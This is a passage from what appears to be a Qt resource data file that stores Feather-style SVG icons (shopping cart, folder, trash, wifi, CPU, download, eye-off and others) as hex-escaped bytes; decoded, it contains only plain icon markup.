\x22\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x32\x38\x22\x20\x76\x69\
\x65\x77\x42\x6f\x78\x3d\x22\x30\x20\x30\x20\x32\x34\x20\x32\x34\
\x22\x20\x66\x69\x6c\x6c\x3d\x22\x6e\x6f\x6e\x65\x22\x20\x73\x74\
\x72\x6f\x6b\x65\x3d\x22\x63\x75\x72\x72\x65\x6e\x74\x43\x6f\x6c\
\x6f\x72\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x77\x69\x64\x74\x68\
\x3d\x22\x32\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x6c\x69\x6e\x65\
\x63\x61\x70\x3d\x22\x72\x6f\x75\x6e\x64\x22\x20\x73\x74\x72\x6f\
\x6b\x65\x2d\x6c\x69\x6e\x65\x6a\x6f\x69\x6e\x3d\x22\x72\x6f\x75\
\x6e\x64\x22\x20\x63\x6c\x61\x73\x73\x3d\x22\x66\x65\x61\x74\x68\
\x65\x72\x20\x66\x65\x61\x74\x68\x65\x72\x2d\x73\x68\x6f\x70\x70\
\x69\x6e\x67\x2d\x63\x61\x72\x74\x22\x3e\x3c\x63\x69\x72\x63\x6c\
\x65\x20\x63\x78\x3d\x22\x39\x22\x20\x63\x79\x3d\x22\x32\x31\x22\
\x20\x72\x3d\x22\x31\x22\x3e\x3c\x2f\x63\x69\x72\x63\x6c\x65\x3e\
\x3c\x63\x69\x72\x63\x6c\x65\x20\x63\x78\x3d\x22\x32\x30\x22\x20\
\x63\x79\x3d\x22\x32\x31\x22\x20\x72\x3d\x22\x31\x22\x3e\x3c\x2f\
\x63\x69\x72\x63\x6c\x65\x3e\x3c\x70\x61\x74\x68\x20\x64\x3d\x22\
\x4d\x31\x20\x31\x68\x34\x6c\x32\x2e\x36\x38\x20\x31\x33\x2e\x33\
\x39\x61\x32\x20\x32\x20\x30\x20\x30\x20\x30\x20\x32\x20\x31\x2e\
\x36\x31\x68\x39\x2e\x37\x32\x61\x32\x20\x32\x20\x30\x20\x30\x20\
\x30\x20\x32\x2d\x31\x2e\x36\x31\x4c\x32\x33\x20\x36\x48\x36\x22\
\x3e\x3c\x2f\x70\x61\x74\x68\x3e\x3c\x2f\x73\x76\x67\x3e\
\x00\x00\x01\x37\
\x3c\
\x73\x76\x67\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\
\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\x67\x2f\x32\x30\x30\
\x30\x2f\x73\x76\x67\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x32\x38\
\x22\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x32\x38\x22\x20\x76\x69\
\x65\x77\x42\x6f\x78\x3d\x22\x30\x20\x30\x20\x32\x34\x20\x32\x34\
\x22\x20\x66\x69\x6c\x6c\x3d\x22\x6e\x6f\x6e\x65\x22\x20\x73\x74\
\x72\x6f\x6b\x65\x3d\x22\x63\x75\x72\x72\x65\x6e\x74\x43\x6f\x6c\
\x6f\x72\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x77\x69\x64\x74\x68\
\x3d\x22\x32\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x6c\x69\x6e\x65\
\x63\x61\x70\x3d\x22\x72\x6f\x75\x6e\x64\x22\x20\x73\x74\x72\x6f\
\x6b\x65\x2d\x6c\x69\x6e\x65\x6a\x6f\x69\x6e\x3d\x22\x72\x6f\x75\
\x6e\x64\x22\x20\x63\x6c\x61\x73\x73\x3d\x22\x66\x65\x61\x74\x68\
\x65\x72\x20\x66\x65\x61\x74\x68\x65\x72\x2d\x66\x6f\x6c\x64\x65\
\x72\x22\x3e\x3c\x70\x61\x74\x68\x20\x64\x3d\x22\x4d\x32\x32\x20\
\x31\x39\x61\x32\x20\x32\x20\x30\x20\x30\x20\x31\x2d\x32\x20\x32\
\x48\x34\x61\x32\x20\x32\x20\x30\x20\x30\x20\x31\x2d\x32\x2d\x32\
\x56\x35\x61\x32\x20\x32\x20\x30\x20\x30\x20\x31\x20\x32\x2d\x32\
\x68\x35\x6c\x32\x20\x33\x68\x39\x61\x32\x20\x32\x20\x30\x20\x30\
\x20\x31\x20\x32\x20\x32\x7a\x22\x3e\x3c\x2f\x70\x61\x74\x68\x3e\
\x3c\x2f\x73\x76\x67\x3e\
\x00\x00\x01\x6f\
\x3c\
\x73\x76\x67\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\
\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\x67\x2f\x32\x30\x30\
\x30\x2f\x73\x76\x67\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x32\x38\
\x22\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x32\x38\x22\x20\x76\x69\
\x65\x77\x42\x6f\x78\x3d\x22\x30\x20\x30\x20\x32\x34\x20\x32\x34\
\x22\x20\x66\x69\x6c\x6c\x3d\x22\x6e\x6f\x6e\x65\x22\x20\x73\x74\
\x72\x6f\x6b\x65\x3d\x22\x63\x75\x72\x72\x65\x6e\x74\x43\x6f\x6c\
\x6f\x72\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x77\x69\x64\x74\x68\
\x3d\x22\x32\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x6c\x69\x6e\x65\
\x63\x61\x70\x3d\x22\x72\x6f\x75\x6e\x64\x22\x20\x73\x74\x72\x6f\
\x6b\x65\x2d\x6c\x69\x6e\x65\x6a\x6f\x69\x6e\x3d\x22\x72\x6f\x75\
\x6e\x64\x22\x20\x63\x6c\x61\x73\x73\x3d\x22\x66\x65\x61\x74\x68\
\x65\x72\x20\x66\x65\x61\x74\x68\x65\x72\x2d\x75\x73\x65\x72\x2d\
\x63\x68\x65\x63\x6b\x22\x3e\x3c\x70\x61\x74\x68\x20\x64\x3d\x22\
\x4d\x31\x36\x20\x32\x31\x76\x2d\x32\x61\x34\x20\x34\x20\x30\x20\
\x30\x20\x30\x2d\x34\x2d\x34\x48\x35\x61\x34\x20\x34\x20\x30\x20\
\x30\x20\x30\x2d\x34\x20\x34\x76\x32\x22\x3e\x3c\x2f\x70\x61\x74\
\x68\x3e\x3c\x63\x69\x72\x63\x6c\x65\x20\x63\x78\x3d\x22\x38\x2e\
\x35\x22\x20\x63\x79\x3d\x22\x37\x22\x20\x72\x3d\x22\x34\x22\x3e\
\x3c\x2f\x63\x69\x72\x63\x6c\x65\x3e\x3c\x70\x6f\x6c\x79\x6c\x69\
\x6e\x65\x20\x70\x6f\x69\x6e\x74\x73\x3d\x22\x31\x37\x20\x31\x31\
\x20\x31\x39\x20\x31\x33\x20\x32\x33\x20\x39\x22\x3e\x3c\x2f\x70\
\x6f\x6c\x79\x6c\x69\x6e\x65\x3e\x3c\x2f\x73\x76\x67\x3e\
\x00\x00\x01\x63\
\x3c\
\x73\x76\x67\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\
\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\x67\x2f\x32\x30\x30\
\x30\x2f\x73\x76\x67\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x32\x38\
\x22\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x32\x38\x22\x20\x76\x69\
\x65\x77\x42\x6f\x78\x3d\x22\x30\x20\x30\x20\x32\x34\x20\x32\x34\
\x22\x20\x66\x69\x6c\x6c\x3d\x22\x6e\x6f\x6e\x65\x22\x20\x73\x74\
\x72\x6f\x6b\x65\x3d\x22\x63\x75\x72\x72\x65\x6e\x74\x43\x6f\x6c\
\x6f\x72\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x77\x69\x64\x74\x68\
\x3d\x22\x32\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x6c\x69\x6e\x65\
\x63\x61\x70\x3d\x22\x72\x6f\x75\x6e\x64\x22\x20\x73\x74\x72\x6f\
\x6b\x65\x2d\x6c\x69\x6e\x65\x6a\x6f\x69\x6e\x3d\x22\x72\x6f\x75\
\x6e\x64\x22\x20\x63\x6c\x61\x73\x73\x3d\x22\x66\x65\x61\x74\x68\
\x65\x72\x20\x66\x65\x61\x74\x68\x65\x72\x2d\x6c\x69\x6e\x6b\x2d\
\x32\x22\x3e\x3c\x70\x61\x74\x68\x20\x64\x3d\x22\x4d\x31\x35\x20\
\x37\x68\x33\x61\x35\x20\x35\x20\x30\x20\x30\x20\x31\x20\x35\x20\
\x35\x20\x35\x20\x35\x20\x30\x20\x30\x20\x31\x2d\x35\x20\x35\x68\
\x2d\x33\x6d\x2d\x36\x20\x30\x48\x36\x61\x35\x20\x35\x20\x30\x20\
\x30\x20\x31\x2d\x35\x2d\x35\x20\x35\x20\x35\x20\x30\x20\x30\x20\
\x31\x20\x35\x2d\x35\x68\x33\x22\x3e\x3c\x2f\x70\x61\x74\x68\x3e\
\x3c\x6c\x69\x6e\x65\x20\x78\x31\x3d\x22\x38\x22\x20\x79\x31\x3d\
\x22\x31\x32\x22\x20\x78\x32\x3d\x22\x31\x36\x22\x20\x79\x32\x3d\
\x22\x31\x32\x22\x3e\x3c\x2f\x6c\x69\x6e\x65\x3e\x3c\x2f\x73\x76\
\x67\x3e\
\x00\x00\x01\xc0\
\x3c\
\x73\x76\x67\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\
\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\x67\x2f\x32\x30\x30\
\x30\x2f\x73\x76\x67\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x32\x38\
\x22\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x32\x38\x22\x20\x76\x69\
\x65\x77\x42\x6f\x78\x3d\x22\x30\x20\x30\x20\x32\x34\x20\x32\x34\
\x22\x20\x66\x69\x6c\x6c\x3d\x22\x6e\x6f\x6e\x65\x22\x20\x73\x74\
\x72\x6f\x6b\x65\x3d\x22\x63\x75\x72\x72\x65\x6e\x74\x43\x6f\x6c\
\x6f\x72\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x77\x69\x64\x74\x68\
\x3d\x22\x32\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x6c\x69\x6e\x65\
\x63\x61\x70\x3d\x22\x72\x6f\x75\x6e\x64\x22\x20\x73\x74\x72\x6f\
\x6b\x65\x2d\x6c\x69\x6e\x65\x6a\x6f\x69\x6e\x3d\x22\x72\x6f\x75\
\x6e\x64\x22\x20\x63\x6c\x61\x73\x73\x3d\x22\x66\x65\x61\x74\x68\
\x65\x72\x20\x66\x65\x61\x74\x68\x65\x72\x2d\x74\x72\x61\x73\x68\
\x2d\x32\x22\x3e\x3c\x70\x6f\x6c\x79\x6c\x69\x6e\x65\x20\x70\x6f\
\x69\x6e\x74\x73\x3d\x22\x33\x20\x36\x20\x35\x20\x36\x20\x32\x31\
\x20\x36\x22\x3e\x3c\x2f\x70\x6f\x6c\x79\x6c\x69\x6e\x65\x3e\x3c\
\x70\x61\x74\x68\x20\x64\x3d\x22\x4d\x31\x39\x20\x36\x76\x31\x34\
\x61\x32\x20\x32\x20\x30\x20\x30\x20\x31\x2d\x32\x20\x32\x48\x37\
\x61\x32\x20\x32\x20\x30\x20\x30\x20\x31\x2d\x32\x2d\x32\x56\x36\
\x6d\x33\x20\x30\x56\x34\x61\x32\x20\x32\x20\x30\x20\x30\x20\x31\
\x20\x32\x2d\x32\x68\x34\x61\x32\x20\x32\x20\x30\x20\x30\x20\x31\
\x20\x32\x20\x32\x76\x32\x22\x3e\x3c\x2f\x70\x61\x74\x68\x3e\x3c\
\x6c\x69\x6e\x65\x20\x78\x31\x3d\x22\x31\x30\x22\x20\x79\x31\x3d\
\x22\x31\x31\x22\x20\x78\x32\x3d\x22\x31\x30\x22\x20\x79\x32\x3d\
\x22\x31\x37\x22\x3e\x3c\x2f\x6c\x69\x6e\x65\x3e\x3c\x6c\x69\x6e\
\x65\x20\x78\x31\x3d\x22\x31\x34\x22\x20\x79\x31\x3d\x22\x31\x31\
\x22\x20\x78\x32\x3d\x22\x31\x34\x22\x20\x79\x32\x3d\x22\x31\x37\
\x22\x3e\x3c\x2f\x6c\x69\x6e\x65\x3e\x3c\x2f\x73\x76\x67\x3e\
\x00\x00\x01\x76\
\x3c\
\x73\x76\x67\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\
\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\x67\x2f\x32\x30\x30\
\x30\x2f\x73\x76\x67\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x32\x38\
\x22\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x32\x38\x22\x20\x76\x69\
\x65\x77\x42\x6f\x78\x3d\x22\x30\x20\x30\x20\x32\x34\x20\x32\x34\
\x22\x20\x66\x69\x6c\x6c\x3d\x22\x6e\x6f\x6e\x65\x22\x20\x73\x74\
\x72\x6f\x6b\x65\x3d\x22\x63\x75\x72\x72\x65\x6e\x74\x43\x6f\x6c\
\x6f\x72\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x77\x69\x64\x74\x68\
\x3d\x22\x32\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x6c\x69\x6e\x65\
\x63\x61\x70\x3d\x22\x72\x6f\x75\x6e\x64\x22\x20\x73\x74\x72\x6f\
\x6b\x65\x2d\x6c\x69\x6e\x65\x6a\x6f\x69\x6e\x3d\x22\x72\x6f\x75\
\x6e\x64\x22\x20\x63\x6c\x61\x73\x73\x3d\x22\x66\x65\x61\x74\x68\
\x65\x72\x20\x66\x65\x61\x74\x68\x65\x72\x2d\x74\x68\x75\x6d\x62\
\x73\x2d\x64\x6f\x77\x6e\x22\x3e\x3c\x70\x61\x74\x68\x20\x64\x3d\
\x22\x4d\x31\x30\x20\x31\x35\x76\x34\x61\x33\x20\x33\x20\x30\x20\
\x30\x20\x30\x20\x33\x20\x33\x6c\x34\x2d\x39\x56\x32\x48\x35\x2e\
\x37\x32\x61\x32\x20\x32\x20\x30\x20\x30\x20\x30\x2d\x32\x20\x31\
\x2e\x37\x6c\x2d\x31\x2e\x33\x38\x20\x39\x61\x32\x20\x32\x20\x30\
\x20\x30\x20\x30\x20\x32\x20\x32\x2e\x33\x7a\x6d\x37\x2d\x31\x33\
\x68\x32\x2e\x36\x37\x41\x32\x2e\x33\x31\x20\x32\x2e\x33\x31\x20\
\x30\x20\x30\x20\x31\x20\x32\x32\x20\x34\x76\x37\x61\x32\x2e\x33\
\x31\x20\x32\x2e\x33\x31\x20\x30\x20\x30\x20\x31\x2d\x32\x2e\x33\
\x33\x20\x32\x48\x31\x37\x22\x3e\x3c\x2f\x70\x61\x74\x68\x3e\x3c\
\x2f\x73\x76\x67\x3e\
\x00\x00\x01\x91\
\x3c\
\x73\x76\x67\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\
\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\x67\x2f\x32\x30\x30\
\x30\x2f\x73\x76\x67\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x32\x38\
\x22\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x32\x38\x22\x20\x76\x69\
\x65\x77\x42\x6f\x78\x3d\x22\x30\x20\x30\x20\x32\x34\x20\x32\x34\
\x22\x20\x66\x69\x6c\x6c\x3d\x22\x6e\x6f\x6e\x65\x22\x20\x73\x74\
\x72\x6f\x6b\x65\x3d\x22\x63\x75\x72\x72\x65\x6e\x74\x43\x6f\x6c\
\x6f\x72\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x77\x69\x64\x74\x68\
\x3d\x22\x32\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x6c\x69\x6e\x65\
\x63\x61\x70\x3d\x22\x72\x6f\x75\x6e\x64\x22\x20\x73\x74\x72\x6f\
\x6b\x65\x2d\x6c\x69\x6e\x65\x6a\x6f\x69\x6e\x3d\x22\x72\x6f\x75\
\x6e\x64\x22\x20\x63\x6c\x61\x73\x73\x3d\x22\x66\x65\x61\x74\x68\
\x65\x72\x20\x66\x65\x61\x74\x68\x65\x72\x2d\x77\x69\x66\x69\x22\
\x3e\x3c\x70\x61\x74\x68\x20\x64\x3d\x22\x4d\x35\x20\x31\x32\x2e\
\x35\x35\x61\x31\x31\x20\x31\x31\x20\x30\x20\x30\x20\x31\x20\x31\
\x34\x2e\x30\x38\x20\x30\x22\x3e\x3c\x2f\x70\x61\x74\x68\x3e\x3c\
\x70\x61\x74\x68\x20\x64\x3d\x22\x4d\x31\x2e\x34\x32\x20\x39\x61\
\x31\x36\x20\x31\x36\x20\x30\x20\x30\x20\x31\x20\x32\x31\x2e\x31\
\x36\x20\x30\x22\x3e\x3c\x2f\x70\x61\x74\x68\x3e\x3c\x70\x61\x74\
\x68\x20\x64\x3d\x22\x4d\x38\x2e\x35\x33\x20\x31\x36\x2e\x31\x31\
\x61\x36\x20\x36\x20\x30\x20\x30\x20\x31\x20\x36\x2e\x39\x35\x20\
\x30\x22\x3e\x3c\x2f\x70\x61\x74\x68\x3e\x3c\x6c\x69\x6e\x65\x20\
\x78\x31\x3d\x22\x31\x32\x22\x20\x79\x31\x3d\x22\x32\x30\x22\x20\
\x78\x32\x3d\x22\x31\x32\x2e\x30\x31\x22\x20\x79\x32\x3d\x22\x32\
\x30\x22\x3e\x3c\x2f\x6c\x69\x6e\x65\x3e\x3c\x2f\x73\x76\x67\x3e\
\
\x00\x00\x02\x9b\
\x3c\
\x73\x76\x67\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\
\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\x67\x2f\x32\x30\x30\
\x30\x2f\x73\x76\x67\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x32\x38\
\x22\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x32\x38\x22\x20\x76\x69\
\x65\x77\x42\x6f\x78\x3d\x22\x30\x20\x30\x20\x32\x34\x20\x32\x34\
\x22\x20\x66\x69\x6c\x6c\x3d\x22\x6e\x6f\x6e\x65\x22\x20\x73\x74\
\x72\x6f\x6b\x65\x3d\x22\x63\x75\x72\x72\x65\x6e\x74\x43\x6f\x6c\
\x6f\x72\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x77\x69\x64\x74\x68\
\x3d\x22\x32\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x6c\x69\x6e\x65\
\x63\x61\x70\x3d\x22\x72\x6f\x75\x6e\x64\x22\x20\x73\x74\x72\x6f\
\x6b\x65\x2d\x6c\x69\x6e\x65\x6a\x6f\x69\x6e\x3d\x22\x72\x6f\x75\
\x6e\x64\x22\x20\x63\x6c\x61\x73\x73\x3d\x22\x66\x65\x61\x74\x68\
\x65\x72\x20\x66\x65\x61\x74\x68\x65\x72\x2d\x63\x70\x75\x22\x3e\
\x3c\x72\x65\x63\x74\x20\x78\x3d\x22\x34\x22\x20\x79\x3d\x22\x34\
\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x31\x36\x22\x20\x68\x65\x69\
\x67\x68\x74\x3d\x22\x31\x36\x22\x20\x72\x78\x3d\x22\x32\x22\x20\
\x72\x79\x3d\x22\x32\x22\x3e\x3c\x2f\x72\x65\x63\x74\x3e\x3c\x72\
\x65\x63\x74\x20\x78\x3d\x22\x39\x22\x20\x79\x3d\x22\x39\x22\x20\
\x77\x69\x64\x74\x68\x3d\x22\x36\x22\x20\x68\x65\x69\x67\x68\x74\
\x3d\x22\x36\x22\x3e\x3c\x2f\x72\x65\x63\x74\x3e\x3c\x6c\x69\x6e\
\x65\x20\x78\x31\x3d\x22\x39\x22\x20\x79\x31\x3d\x22\x31\x22\x20\
\x78\x32\x3d\x22\x39\x22\x20\x79\x32\x3d\x22\x34\x22\x3e\x3c\x2f\
\x6c\x69\x6e\x65\x3e\x3c\x6c\x69\x6e\x65\x20\x78\x31\x3d\x22\x31\
\x35\x22\x20\x79\x31\x3d\x22\x31\x22\x20\x78\x32\x3d\x22\x31\x35\
\x22\x20\x79\x32\x3d\x22\x34\x22\x3e\x3c\x2f\x6c\x69\x6e\x65\x3e\
\x3c\x6c\x69\x6e\x65\x20\x78\x31\x3d\x22\x39\x22\x20\x79\x31\x3d\
\x22\x32\x30\x22\x20\x78\x32\x3d\x22\x39\x22\x20\x79\x32\x3d\x22\
\x32\x33\x22\x3e\x3c\x2f\x6c\x69\x6e\x65\x3e\x3c\x6c\x69\x6e\x65\
\x20\x78\x31\x3d\x22\x31\x35\x22\x20\x79\x31\x3d\x22\x32\x30\x22\
\x20\x78\x32\x3d\x22\x31\x35\x22\x20\x79\x32\x3d\x22\x32\x33\x22\
\x3e\x3c\x2f\x6c\x69\x6e\x65\x3e\x3c\x6c\x69\x6e\x65\x20\x78\x31\
\x3d\x22\x32\x30\x22\x20\x79\x31\x3d\x22\x39\x22\x20\x78\x32\x3d\
\x22\x32\x33\x22\x20\x79\x32\x3d\x22\x39\x22\x3e\x3c\x2f\x6c\x69\
\x6e\x65\x3e\x3c\x6c\x69\x6e\x65\x20\x78\x31\x3d\x22\x32\x30\x22\
\x20\x79\x31\x3d\x22\x31\x34\x22\x20\x78\x32\x3d\x22\x32\x33\x22\
\x20\x79\x32\x3d\x22\x31\x34\x22\x3e\x3c\x2f\x6c\x69\x6e\x65\x3e\
\x3c\x6c\x69\x6e\x65\x20\x78\x31\x3d\x22\x31\x22\x20\x79\x31\x3d\
\x22\x39\x22\x20\x78\x32\x3d\x22\x34\x22\x20\x79\x32\x3d\x22\x39\
\x22\x3e\x3c\x2f\x6c\x69\x6e\x65\x3e\x3c\x6c\x69\x6e\x65\x20\x78\
\x31\x3d\x22\x31\x22\x20\x79\x31\x3d\x22\x31\x34\x22\x20\x78\x32\
\x3d\x22\x34\x22\x20\x79\x32\x3d\x22\x31\x34\x22\x3e\x3c\x2f\x6c\
\x69\x6e\x65\x3e\x3c\x2f\x73\x76\x67\x3e\
\x00\x00\x01\x72\
\x3c\
\x73\x76\x67\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\
\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\x67\x2f\x32\x30\x30\
\x30\x2f\x73\x76\x67\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x32\x38\
\x22\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x32\x38\x22\x20\x76\x69\
\x65\x77\x42\x6f\x78\x3d\x22\x30\x20\x30\x20\x32\x34\x20\x32\x34\
\x22\x20\x66\x69\x6c\x6c\x3d\x22\x6e\x6f\x6e\x65\x22\x20\x73\x74\
\x72\x6f\x6b\x65\x3d\x22\x63\x75\x72\x72\x65\x6e\x74\x43\x6f\x6c\
\x6f\x72\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x77\x69\x64\x74\x68\
\x3d\x22\x32\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x6c\x69\x6e\x65\
\x63\x61\x70\x3d\x22\x72\x6f\x75\x6e\x64\x22\x20\x73\x74\x72\x6f\
\x6b\x65\x2d\x6c\x69\x6e\x65\x6a\x6f\x69\x6e\x3d\x22\x72\x6f\x75\
\x6e\x64\x22\x20\x63\x6c\x61\x73\x73\x3d\x22\x66\x65\x61\x74\x68\
\x65\x72\x20\x66\x65\x61\x74\x68\x65\x72\x2d\x64\x6f\x77\x6e\x6c\
\x6f\x61\x64\x22\x3e\x3c\x70\x61\x74\x68\x20\x64\x3d\x22\x4d\x32\
\x31\x20\x31\x35\x76\x34\x61\x32\x20\x32\x20\x30\x20\x30\x20\x31\
\x2d\x32\x20\x32\x48\x35\x61\x32\x20\x32\x20\x30\x20\x30\x20\x31\
\x2d\x32\x2d\x32\x76\x2d\x34\x22\x3e\x3c\x2f\x70\x61\x74\x68\x3e\
\x3c\x70\x6f\x6c\x79\x6c\x69\x6e\x65\x20\x70\x6f\x69\x6e\x74\x73\
\x3d\x22\x37\x20\x31\x30\x20\x31\x32\x20\x31\x35\x20\x31\x37\x20\
\x31\x30\x22\x3e\x3c\x2f\x70\x6f\x6c\x79\x6c\x69\x6e\x65\x3e\x3c\
\x6c\x69\x6e\x65\x20\x78\x31\x3d\x22\x31\x32\x22\x20\x79\x31\x3d\
\x22\x31\x35\x22\x20\x78\x32\x3d\x22\x31\x32\x22\x20\x79\x32\x3d\
\x22\x33\x22\x3e\x3c\x2f\x6c\x69\x6e\x65\x3e\x3c\x2f\x73\x76\x67\
\x3e\
\x00\x00\x01\xcc\
\x3c\
\x73\x76\x67\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\
\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\x67\x2f\x32\x30\x30\
\x30\x2f\x73\x76\x67\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x32\x38\
\x22\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x32\x38\x22\x20\x76\x69\
\x65\x77\x42\x6f\x78\x3d\x22\x30\x20\x30\x20\x32\x34\x20\x32\x34\
\x22\x20\x66\x69\x6c\x6c\x3d\x22\x6e\x6f\x6e\x65\x22\x20\x73\x74\
\x72\x6f\x6b\x65\x3d\x22\x63\x75\x72\x72\x65\x6e\x74\x43\x6f\x6c\
\x6f\x72\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x77\x69\x64\x74\x68\
\x3d\x22\x32\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x6c\x69\x6e\x65\
\x63\x61\x70\x3d\x22\x72\x6f\x75\x6e\x64\x22\x20\x73\x74\x72\x6f\
\x6b\x65\x2d\x6c\x69\x6e\x65\x6a\x6f\x69\x6e\x3d\x22\x72\x6f\x75\
\x6e\x64\x22\x20\x63\x6c\x61\x73\x73\x3d\x22\x66\x65\x61\x74\x68\
\x65\x72\x20\x66\x65\x61\x74\x68\x65\x72\x2d\x65\x79\x65\x2d\x6f\
\x66\x66\x22\x3e\x3c\x70\x61\x74\x68\x20\x64\x3d\x22\x4d\x31\x37\
\x2e\x39\x34\x20\x31\x37\x2e\x39\x34\x41\x31\x30\x2e\x30\x37\x20\
\x31\x30\x2e\x30\x37\x20\x30\x20\x30\x20\x31\x20\x31\x32\x20\x32\
\x30\x63\x2d\x37\x20\x30\x2d\x31\x31\x2d\x38\x2d\x31\x31\x2d\x38\
\x61\x31\x38\x2e\x34\x35\x20\x31\x38\x2e\x34\x35\x20\x30\x20\x30\
\x20\x31\x20\x35\x2e\x30\x36\x2d\x35\x2e\x39\x34\x4d\x39\x2e\x39\
\x20\x34\x2e\x32\x34\x41\x39\x2e\x31\x32\x20\x39\x2e\x31\x32\x20\
\x30\x20\x30\x20\x31\x20\x31\x32\x20\x34\x63\x37\x20\x30\x20\x31\
\x31\x20\x38\x20\x31\x31\x20\x38\x61\x31\x38\x2e\x35\x20\x31\x38\
\x2e\x35\x20\x30\x20\x30\x20\x31\x2d\x32\x2e\x31\x36\x20\x33\x2e\
\x31\x39\x6d\x2d\x36\x2e\x37\x32\x2d\x31\x2e\x30\x37\x61\x33\x20\
\x33\x20\x30\x20\x31\x20\x31\x2d\x34\x2e\x32\x34\x2d\x34\x2e\x32\
\x34\x22\x3e\x3c\x2f\x70\x61\x74\x68\x3e\x3c\x6c\x69\x6e\x65\x20\
\x78\x31\x3d\x22\x31\x22\x20\x79\x31\x3d\x22\x31\x22\x20\x78\x32\
\x3d\x22\x32\x33\x22\x20\x79\x32\x3d\x22\x32\x33\x22\x3e\x3c\x2f\
\x6c\x69\x6e\x65\x3e\x3c\x2f\x73\x76\x67\x3e\
\x00\x00\x01\xa0\
\x3c\
\x73\x76\x67\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\
\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\x67\x2f\x32\x30\x30\
\x30\x2f\x73\x76\x67\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x32\x38\
\x22\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x32\x38\x22\x20\x76\x69\
\x65\x77\x42\x6f\x78\x3d\x22\x30\x20\x30\x20\x32\x34\x20\x32\x34\
\x22\x20\x66\x69\x6c\x6c\x3d\x22\x6e\x6f\x6e\x65\x22\x20\x73\x74\
\x72\x6f\x6b\x65\x3d\x22\x63\x75\x72\x72\x65\x6e\x74\x43\x6f\x6c\
\x6f\x72\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x77\x69\x64\x74\x68\
\x3d\x22\x32\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x6c\x69\x6e\x65\
\x63\x61\x70\x3d\x22\x72\x6f\x75\x6e\x64\x22\x20\x73\x74\x72\x6f\
\x6b\x65\x2d\x6c\x69\x6e\x65\x6a\x6f\x69\x6e\x3d\x22\x72\x6f\x75\
\x6e\x64\x22\x20\x63\x6c\x61\x73\x73\x3d\x22\x66\x65\x61\x74\x68\
\x65\x72\x20\x66\x65\x61\x74\x68\x65\x72\x2d\x61\x6c\x65\x72\x74\
\x2d\x6f\x63\x74\x61\x67\x6f\x6e\x22\x3e\x3c\x70\x6f\x6c\x79\x67\
\x6f\x6e\x20\x70\x6f\x69\x6e\x74\x73\x3d\x22\x37\x2e\x38\x36\x20\
\x32\x20\x31\x36\x2e\x31\x34\x20\x32\x20\x32\x32\x20\x37\x2e\x38\
\x36\x20\x32\x32\x20\x31\x36\x2e\x31\x34\x20\x31\x36\x2e\x31\x34\
\x20\x32\x32\x20\x37\x2e\x38\x36\x20\x32\x32\x20\x32\x20\x31\x36\
